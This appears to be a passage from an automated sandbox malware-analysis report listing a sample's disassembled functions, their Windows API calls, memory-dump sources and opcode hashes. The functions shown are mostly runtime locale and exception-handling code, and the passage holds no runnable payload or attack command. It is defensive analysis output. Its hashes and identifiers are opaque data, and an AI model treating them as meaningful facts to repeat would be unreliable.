        • Instruction ID: 4bb49e5798749ae045ead188a28f1ad40990007d73231863554395187ef29ef4
        • Opcode Fuzzy Hash: 09f575395fc5b91562471791b254729d5b340b94d6b688dc575fe1ada46878e0
        • Instruction Fuzzy Hash: 1CD23B71E082298FDB75CE28CD417EAB7B5EB44344F1445EAD48DE7680D7B8AE828F41
        Function 0010DD28 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE
        Download Yara Rule
        APIs
        • GetLocaleInfoW.KERNEL32(?,2000000B,0010E046,00000002,00000000,?,?,?,0010E046,?,00000000), ref: 0010DDC1
        • GetLocaleInfoW.KERNEL32(?,20001004,0010E046,00000002,00000000,?,?,?,0010E046,?,00000000), ref: 0010DDEA
        • GetACP.KERNEL32(?,?,0010E046,?,00000000), ref: 0010DDFF
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: InfoLocale
        • String ID: ACP$OCP
        • API String ID: 2299586839-711371036
        • Opcode ID: 93a25ab8ec256ffe9d154beb93977dd718e74721d2e6c7a6110726ddbf970784
        • Instruction ID: 985036c036193ae891d38992d7c21ba2a1fbdd5f3b535b40377bc2b94b21f33d
        • Opcode Fuzzy Hash: 93a25ab8ec256ffe9d154beb93977dd718e74721d2e6c7a6110726ddbf970784
        • Instruction Fuzzy Hash: E521D332700104E6DB399FD8EA00BA777A6EF50B60B578064E98ADB1C0F7B2DD80D790
        Function 0010DEFD Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE
        Download Yara Rule
        APIs
          • Part of subcall function 001041E0: GetLastError.KERNEL32(?,00000008,0010708C), ref: 001041E4
          • Part of subcall function 001041E0: SetLastError.KERNEL32(00000000,00000001,00000005,000000FF), ref: 00104286
        • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 0010E009
        • IsValidCodePage.KERNEL32(00000000), ref: 0010E052
        • IsValidLocale.KERNEL32(?,00000001), ref: 0010E061
        • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 0010E0A9
        • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 0010E0C8
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
        • String ID:
        • API String ID: 415426439-0
        • Opcode ID: 685f86b02c4f2f52c3f3f3fc24ada26bb4db944eb8ca37a442fc682fa5652914
        • Instruction ID: 1eda1e812d5d4e00a9b32cc9285489ae739c511b1f1759b558e9872be04928c7
        • Opcode Fuzzy Hash: 685f86b02c4f2f52c3f3f3fc24ada26bb4db944eb8ca37a442fc682fa5652914
        • Instruction Fuzzy Hash: 5F518E71A00206ABDB14DFA5DC41ABAB7B8BF58700F048869F981EB1D1E7F09A418B61
        Function 0010D599 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 251COMMONLIBRARYCODE
        Download Yara Rule
        APIs
          • Part of subcall function 001041E0: GetLastError.KERNEL32(?,00000008,0010708C), ref: 001041E4
          • Part of subcall function 001041E0: SetLastError.KERNEL32(00000000,00000001,00000005,000000FF), ref: 00104286
        • GetACP.KERNEL32(?,?,?,?,?,?,00102903,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0010D65A
        • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00102903,?,?,?,00000055,?,-00000050,?,?), ref: 0010D685
        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 0010D7E8
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: ErrorLast$CodeInfoLocalePageValid
        • String ID: utf8
        • API String ID: 607553120-905460609
        • Opcode ID: 303e4c0882863491b34e5ce0fbe4f7776dc098e4007e328025c9e27768c3f6dc
        • Instruction ID: 46f8a7dd69f9efd64d24cd5529d6ac6ca273fc9dc1fd0737b7215933fab1ffa7
        • Opcode Fuzzy Hash: 303e4c0882863491b34e5ce0fbe4f7776dc098e4007e328025c9e27768c3f6dc
        • Instruction Fuzzy Hash: D571E871600302AAD729ABB5EC86BBB77A8EF54704F14442AF585D71C1EBF1ED40CBA1
        Function 00105289 Relevance: 6.3, APIs: 4, Instructions: 337COMMON
        Download Yara Rule
        APIs
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: _strrchr
        • String ID:
        • API String ID: 3213747228-0
        • Opcode ID: 2f7a989578186c1f6a0fdb5e5d34400678512d60c2caa00803a6b2ba2aa04570
        • Instruction ID: a79f71c0452925b8025b323ffcfbb1c6f576a8134f5cd54f98da683ec349b0d4
        • Opcode Fuzzy Hash: 2f7a989578186c1f6a0fdb5e5d34400678512d60c2caa00803a6b2ba2aa04570
        • Instruction Fuzzy Hash: 9BB13632904A459FDB158F68C8817FFBBA7EF55340F158169E885EB282D3B49D41CFA0
        Function 000F7CC9 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
        Download Yara Rule
        APIs
        • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 000F7CD5
        • IsDebuggerPresent.KERNEL32 ref: 000F7DA1
        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 000F7DBA
        • UnhandledExceptionFilter.KERNEL32(?), ref: 000F7DC4
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
        • String ID:
        • API String ID: 254469556-0
        • Opcode ID: 3c44edf08208ff73288b4d599929a36beaf80d1419debf9b7ab96fd7c9619f94
        • Instruction ID: c51eb5930ceb031b6b645d5d099f4c426a84cfa542342c59a4e3018f06fb6065
        • Opcode Fuzzy Hash: 3c44edf08208ff73288b4d599929a36beaf80d1419debf9b7ab96fd7c9619f94
        • Instruction Fuzzy Hash: 213105B5C0521CDADF20DFA4D949BDDBBB8BF08304F1041AAE50CAB250EB719A849F85
        Function 0010D9AC Relevance: 4.7, APIs: 3, Instructions: 205COMMON
        Download Yara Rule
        APIs
          • Part of subcall function 001041E0: GetLastError.KERNEL32(?,00000008,0010708C), ref: 001041E4
          • Part of subcall function 001041E0: SetLastError.KERNEL32(00000000,00000001,00000005,000000FF), ref: 00104286
        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0010DA00
        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0010DA4A
        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0010DB10
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: InfoLocale$ErrorLast
        • String ID:
        • API String ID: 661929714-0
        • Opcode ID: 322b082648c9839749ee2f45b8de748c544d2f1283435938de57bc3ae129e237
        • Instruction ID: 1fbd4b75c27b983602353252323807b533a3e345109e1592032d65497a84f1e9
        • Opcode Fuzzy Hash: 322b082648c9839749ee2f45b8de748c544d2f1283435938de57bc3ae129e237
        • Instruction Fuzzy Hash: BE61BE71A0420BDBEB28DF68EC82BAAB7A8EF15301F154179E985C75C5F7B4D980CB50
        Function 000FBA03 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
        Download Yara Rule
        APIs
        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000001), ref: 000FBAFB
        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000001), ref: 000FBB05
        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000001), ref: 000FBB12
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: ExceptionFilterUnhandled$DebuggerPresent
        • String ID:
        • API String ID: 3906539128-0
        • Opcode ID: 8ebf63dbca40dcc65a7dc553bf99a16ccce5ad4fcb5bd1bd7a79cc1b05db3e67
        • Instruction ID: 2543687b377288e09e1dc258c0711c4d15158b31b0dc9266f35dcb3d8e44a3cb
        • Opcode Fuzzy Hash: 8ebf63dbca40dcc65a7dc553bf99a16ccce5ad4fcb5bd1bd7a79cc1b05db3e67
        • Instruction Fuzzy Hash: 0C31C27490121C9BCB21DF68D988BDDBBB4BF08310F5041DAE51CA6251EB709F818F45
        Function 00100B00 Relevance: 3.4, APIs: 2, Instructions: 449COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 349bac49a2cf059cb2622c8f5045624a5e235da172517e6992a086ebdc4c2b38
        • Instruction ID: e7b6fa44e498600c45004f73b85dc0dfb128b497a1f2863d09f5f71bdd3cd626
        • Opcode Fuzzy Hash: 349bac49a2cf059cb2622c8f5045624a5e235da172517e6992a086ebdc4c2b38
        • Instruction Fuzzy Hash: 67F13E71E002199FDF15CFA8C990BADB7B1FF48314F158269E859AB381D770AE41CB90
        Function 00104869 Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE
        Download Yara Rule
        APIs
        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000000), ref: 00104A96
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: ExceptionRaise
        • String ID:
        • API String ID: 3997070919-0
        • Opcode ID: b8af45cb6e8385fc78166538da934a2722e076621582241bd68de28bb286f654
        • Instruction ID: 75d22d57e1c996d215060a7a58ec31e41fa751fe8d68beaab83e1650bd5d905e
        • Opcode Fuzzy Hash: b8af45cb6e8385fc78166538da934a2722e076621582241bd68de28bb286f654
        • Instruction Fuzzy Hash: 8AB11671610608DFD718CF28C4C6B657BA0FB49364F298658EADACF2E1C775E992CB40
        Function 000F779C Relevance: 1.6, APIs: 1, Instructions: 147COMMON
        Download Yara Rule
        APIs
        • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 000F77B2
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: FeaturePresentProcessor
        • String ID:
        • API String ID: 2325560087-0
        • Opcode ID: a2d3feb7cb4e74f9e70c064c1264570f8fe8426ae94598deda0642b3923d4622
        • Instruction ID: 4584458d30372045d372d7b13660c68ae7ac5acc10ea5c9b573b3fc651fd8bfd
        • Opcode Fuzzy Hash: a2d3feb7cb4e74f9e70c064c1264570f8fe8426ae94598deda0642b3923d4622
        • Instruction Fuzzy Hash: BF519272904219CFEB15CF94DC857AABBF0FB48354F24852AD509EBB51D3B49980CB91
        Function 0010AA16 Relevance: 1.6, APIs: 1, Instructions: 140COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 11907cf0b1f14f76f6b4471cd16b0d2aa1b9c7109bbcfff83a7118a943b57ba5
        • Instruction ID: ac30b14e85d76341ffb66bd14d87bd1113a155a0b49bc18b44b7c999bf1f47bf
        • Opcode Fuzzy Hash: 11907cf0b1f14f76f6b4471cd16b0d2aa1b9c7109bbcfff83a7118a943b57ba5
        • Instruction Fuzzy Hash: 4A41B1B5804218AFDF20DF69CC89AEABBB9EF49300F5442D9E448D3241DB759E848F50
        Function 000FDAB4 Relevance: 1.6, Strings: 1, Instructions: 344COMMON
        Download Yara Rule
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID:
        • String ID: 0
        • API String ID: 0-4108050209
        • Opcode ID: 7b20df1781b90c238a9092cdaf01cb0194f73bd64abf14a3ea8c0c1cfcb51fee
        • Instruction ID: 90287dbeaa4372d9392487b253757a48c608f089e67a94fdbb891a561ba9f185
        • Opcode Fuzzy Hash: 7b20df1781b90c238a9092cdaf01cb0194f73bd64abf14a3ea8c0c1cfcb51fee
        • Instruction Fuzzy Hash: 6BC1DF70A0064ECFCB68CF68C4946BEBBF3AF05310F14461ED6569BA92C770AC45EB91
        Function 0010DBFF Relevance: 1.6, APIs: 1, Instructions: 83COMMON
        Download Yara Rule
        APIs
          • Part of subcall function 001041E0: GetLastError.KERNEL32(?,00000008,0010708C), ref: 001041E4
          • Part of subcall function 001041E0: SetLastError.KERNEL32(00000000,00000001,00000005,000000FF), ref: 00104286
        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0010DC53
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: ErrorLast$InfoLocale
        • String ID:
        • API String ID: 3736152602-0
        • Opcode ID: ee258fceb55c07ac49a06865a55387115ae1f193b7411e9d411a1fedebe36486
        • Instruction ID: 3a1f1d326a2b9b5729a0b021caf136864bf5e89a4d4b11554fa1b4ce86df93e7
        • Opcode Fuzzy Hash: ee258fceb55c07ac49a06865a55387115ae1f193b7411e9d411a1fedebe36486
        • Instruction Fuzzy Hash: B621C576604206ABEB289F55ED42EBA77A8EF14310F14407DFE45C6181EBF5ED40DB50
        Function 0010D886 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
        Download Yara Rule
        APIs
          • Part of subcall function 001041E0: GetLastError.KERNEL32(?,00000008,0010708C), ref: 001041E4
          • Part of subcall function 001041E0: SetLastError.KERNEL32(00000000,00000001,00000005,000000FF), ref: 00104286
        • EnumSystemLocalesW.KERNEL32(0010D9AC,00000001,00000000,?,-00000050,?,0010DFDD,00000000,?,?,?,00000055,?), ref: 0010D8F8
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: ErrorLast$EnumLocalesSystem
        • String ID:
        • API String ID: 2417226690-0
        • Opcode ID: 846eb64228c50dd8b710cbd6f9a7ea6febbb4b06155c9057b0bd31ca8f1b3c62
        • Instruction ID: b5e37c727f270376926eebd7c038df12d81563d91023e9e5ed54cf93db5aa54c
        • Opcode Fuzzy Hash: 846eb64228c50dd8b710cbd6f9a7ea6febbb4b06155c9057b0bd31ca8f1b3c62
        • Instruction Fuzzy Hash: 2D110C3B2107059FDB189F79D8916BAB792FF84358B14842DE9C687A80D3B17942C740
        Function 0010DE2E Relevance: 1.5, APIs: 1, Instructions: 45COMMON
        Download Yara Rule
        APIs
          • Part of subcall function 001041E0: GetLastError.KERNEL32(?,00000008,0010708C), ref: 001041E4
          • Part of subcall function 001041E0: SetLastError.KERNEL32(00000000,00000001,00000005,000000FF), ref: 00104286
        • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0010DBC8,00000000,00000000,?), ref: 0010DE5A
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: ErrorLast$InfoLocale
        • String ID:
        • API String ID: 3736152602-0
        • Opcode ID: b848b2a44555d3fc6c34af5a3de6840613346c60b7eb5e3355594aedc52a841f
        • Instruction ID: bd75ce2b98c00fc4f6083c4717dfdb92a27c1249101344fa56362e7d575a72cd
        • Opcode Fuzzy Hash: b848b2a44555d3fc6c34af5a3de6840613346c60b7eb5e3355594aedc52a841f
        • Instruction Fuzzy Hash: ADF02836610212BBDB285BA0EC46BBBB768EB50754F150429EC86A71C0EBF4FE41C690
        Function 0010D794 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
        Download Yara Rule
        APIs
          • Part of subcall function 001041E0: GetLastError.KERNEL32(?,00000008,0010708C), ref: 001041E4
          • Part of subcall function 001041E0: SetLastError.KERNEL32(00000000,00000001,00000005,000000FF), ref: 00104286
        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 0010D7E8
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: ErrorLast$InfoLocale
        • String ID: utf8
        • API String ID: 3736152602-905460609
        • Opcode ID: 2c7aa8634a7924cc9fdf854d9ef3c80d9b26c8ecd4d97eea95ceb1347ce6ba8f
        • Instruction ID: f2fe080594ea177ffd188ed05a5f7d2c0a235dff8d6c755ab4b39059943f64e1
        • Opcode Fuzzy Hash: 2c7aa8634a7924cc9fdf854d9ef3c80d9b26c8ecd4d97eea95ceb1347ce6ba8f
        • Instruction Fuzzy Hash: 41F0F436600105ABC728AB64EC46ABA37A8DF58350B014179F602D7281EBB4AD048750
        Function 0010D921 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
        Download Yara Rule
        APIs
          • Part of subcall function 001041E0: GetLastError.KERNEL32(?,00000008,0010708C), ref: 001041E4
          • Part of subcall function 001041E0: SetLastError.KERNEL32(00000000,00000001,00000005,000000FF), ref: 00104286
        • EnumSystemLocalesW.KERNEL32(0010DBFF,00000001,?,?,-00000050,?,0010DFA1,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 0010D96B
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: ErrorLast$EnumLocalesSystem
        • String ID:
        • API String ID: 2417226690-0
        • Opcode ID: 438a480a9aa0dc0d8d01c1a9dea341dea1bd2f18210090445cfcccb0161724e9
        • Instruction ID: a093601f9c6457ebe960daea0519abb92243d7023617169503990bc22a9e5ce3
        • Opcode Fuzzy Hash: 438a480a9aa0dc0d8d01c1a9dea341dea1bd2f18210090445cfcccb0161724e9
        • Instruction Fuzzy Hash: 68F0C2762003045FDB245F79A882A7ABB91EF8576CB05846CF9854B6D0C7F1AC42C650
        Function 001062CB Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE
        Download Yara Rule
        APIs
          • Part of subcall function 000FE9A9: EnterCriticalSection.KERNEL32(-001705FF,?,00101531,00000000,0011F1E8,0000000C,001014F8,?,?,00104EE2,?,?,0010437E,00000001,00000364,00000001), ref: 000FE9B8
        • EnumSystemLocalesW.KERNEL32(001062BE,00000001,0011F3D8,0000000C,0010672D,00000000), ref: 00106303
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: CriticalEnterEnumLocalesSectionSystem
        • String ID:
        • API String ID: 1272433827-0
        • Opcode ID: 386b0305ecd06fa250fd5bdb8f6bd218aab2dbb641340bba7c36ce84f6907957
        • Instruction ID: a9a397c3e2fa24eb6b4dfa15c76e2b0be0fd46f7a0aef76d710e50c3219d4e37
        • Opcode Fuzzy Hash: 386b0305ecd06fa250fd5bdb8f6bd218aab2dbb641340bba7c36ce84f6907957
        • Instruction Fuzzy Hash: 60F03776A14304EFD700EFA8E882B9D77F0FB48760F10416AE515DB6E1C7B55981CB50
        Function 0010D83B Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
        Download Yara Rule
        APIs
          • Part of subcall function 001041E0: GetLastError.KERNEL32(?,00000008,0010708C), ref: 001041E4
          • Part of subcall function 001041E0: SetLastError.KERNEL32(00000000,00000001,00000005,000000FF), ref: 00104286
